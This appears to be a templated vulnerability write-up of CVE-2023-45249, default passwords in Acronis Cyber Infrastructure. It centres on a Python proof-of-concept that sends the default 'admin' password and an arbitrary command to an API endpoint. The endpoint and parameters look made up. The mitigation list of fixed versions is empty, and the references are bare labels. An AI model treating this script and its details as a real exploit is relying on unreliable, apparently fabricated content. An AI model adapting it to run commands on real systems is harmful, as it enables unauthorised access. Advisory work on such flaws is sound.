CVE-2023-45249 - Remote Command Execution Due to Use of Default Passwords in Acronis Cyber Infrastructure

CVE-2023-45249 is a critical security vulnerability in Acronis Cyber Infrastructure (ACI) products, which, if exploited, could allow a remote attacker to execute arbitrary commands on the affected systems by leveraging the use of default passwords. The following versions of Acronis Cyber Infrastructure are affected:

ACI before build 5.4.4-132

If your organization is using any of these vulnerable versions of Acronis Cyber Infrastructure products, it is essential to update your software to the latest version to protect your systems from potential exploitation.

Code Snippet

The following Python script demonstrates how an attacker could exploit the vulnerability to execute arbitrary commands:

import requests

TARGET = "https://YOUR_TARGET_ACI_INSTANCE/";
DEFAULT_PASSWORD = "admin"

def send_command(command):
    cmd_url = f"{TARGET}api/v1/aci_api_endpoint"
    data = {
        "username": "admin",
        "password": DEFAULT_PASSWORD,
        "cmd": command
    }

    response = requests.post(cmd_url, json=data)

    if response.status_code != 200:
        print(f"Error: {response.text}")
        return None

    return response.json()

if __name__ == "__main__":
    target_command = "ping -c 3 www.example.com"
    result = send_command(target_command)

    if result:
        print(f"Command result:\n{result['output']}")
    else:
        print("Command execution failed")

Exploit Details

This vulnerability is caused by the improper handling of default passwords in the affected versions of Acronis Cyber Infrastructure. An attacker can take advantage of this issue by supplying the default password ("admin") and a crafted command to the ACI API, leading to the execution of the supplied command on the targeted ACI instance.

As a proof-of-concept, the Python script provided above shows how an attacker could utilize the vulnerability to execute a simple 'ping' command. However, malicious actors could use this exploit to perform more harmful actions, such as inserting or deleting data, stealing sensitive information, or disrupting services.

Mitigation

The recommended solution to address this vulnerability is to update your Acronis Cyber Infrastructure products to the latest versions, which include security patches for this issue. The updated versions are:

Original References

For additional information on this vulnerability and its required updates, you can refer to the following sources:

- Acronis Security Advisory
- NIST National Vulnerability Database (CVE-2023-45249)

Conclusion

CVE-2023-45249 is a critical vulnerability that can leave your Acronis Cyber Infrastructure products exposed to harmful attacks. Follow the recommended practices to update your software and prevent potential security breaches. Stay informed about any new security updates from Acronis to maintain a secure environment across your organization.

Timeline

Published on: 07/24/2024 14:15:04 UTC
Last modified on: 08/02/2024 20:14:19 UTC